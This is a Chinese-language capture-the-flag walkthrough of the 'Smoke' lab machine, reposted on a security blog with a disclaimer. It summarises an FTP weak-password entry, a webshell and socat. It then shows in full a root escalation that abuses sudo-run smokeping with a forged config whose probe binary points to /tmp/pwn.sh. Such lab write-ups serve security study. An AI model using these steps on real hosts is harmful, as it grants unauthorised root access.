文章总结: 本文详细记录了Smoke靶机的完整渗透测试过程,从信息收集开始,通过子域名爆破发现ftp子域名,利用FTP弱密码kelvin登录后上传Webshell获取初始立足点,使用socat稳定shell后通过cpulimit权限提升至tkbic用户,最终利用Smokeping配置文件漏洞成功提权至root并获取flag。整个过程展示了实战中的多种技术组合应用。 综合评分: 85 文章分类: 渗透测试,实战经验,WEB安全,内网渗透,红队
刚开始我一直自己手动伪造的配置文件
但是老是因为 Database 段落报错,说明我们对该版本 smokeping 要求的配置项还不够精准。
cat <<EOF > /tmp/evil.conf*** General ***owner = rootcontact = root@localhostmailhost = localhostsendmail = /bin/shimgcache = /tmpimgurl = http://localhost/imgdatadir = /tmppiddir = /tmpcgiurl = http://localhost/smokeping.cgismokemail = /etc/smokeping/smokemailtmail = /etc/smokeping/tmail
*** Database ***step = 300pings = 20# 注意这里:变量名是 path 而不是 filenamepath = /tmp/test.rrd
*** Presentation ***template = /etc/smokeping/basepage.html.dist
*** Probes ***+ FPingbinary = /tmp/pwn.sh
*** Targets ***probe = FPingmenu = Toptitle = Network Latency Grapher+ Localmenu = Localtitle = Localhosthost = 127.0.0.1EOF
但是一直在报错,没办法就一直拷打ai,终于拷打成功了。
我们去看看能不能修改配置文件
可以看到我们无法去修改,那么我们可以去伪造
既然系统里原本就有一个正确的配置文件,我们直接把它复制出来,然后用 sed 命令把其中的二进制路径改掉。这是最稳妥的方法,绝对不会报语法错误。
- 复制原配置并修改 binary 路径
复制现有的正确配置到 /tmpcp /etc/smokeping/config /tmp/evil.conf# 使用 sed 将原配置中的 fping 路径替换为我们的提权脚本路径# 注意:我们直接替换 Probes 段落下的 binary 定义sed -i 's|binary = .*|binary = /tmp/pwn.sh|g' /tmp/evil.conf
- 检查一下修改是否成功
grep "binary =" /tmp/evil.conf(如果输出显示 binary = /tmp/pwn.sh,说明成功了!)
- 启动提权
# 先清理可能存在的进程sudo /usr/bin/pkill smokeping# 使用这个“微调”后的正版配置启动sudo /usr/sbin/smokeping --config=/tmp/evil.conf --debug-daemon
我们可以看到成功拿到root的shell,而且找到了user.txt。
至此,这个靶机渗透测试成功。
这个靶机学到了socat可以去稳定shell的。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:MS02423 MS02423 MS02423《群友靶机之Smoke》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论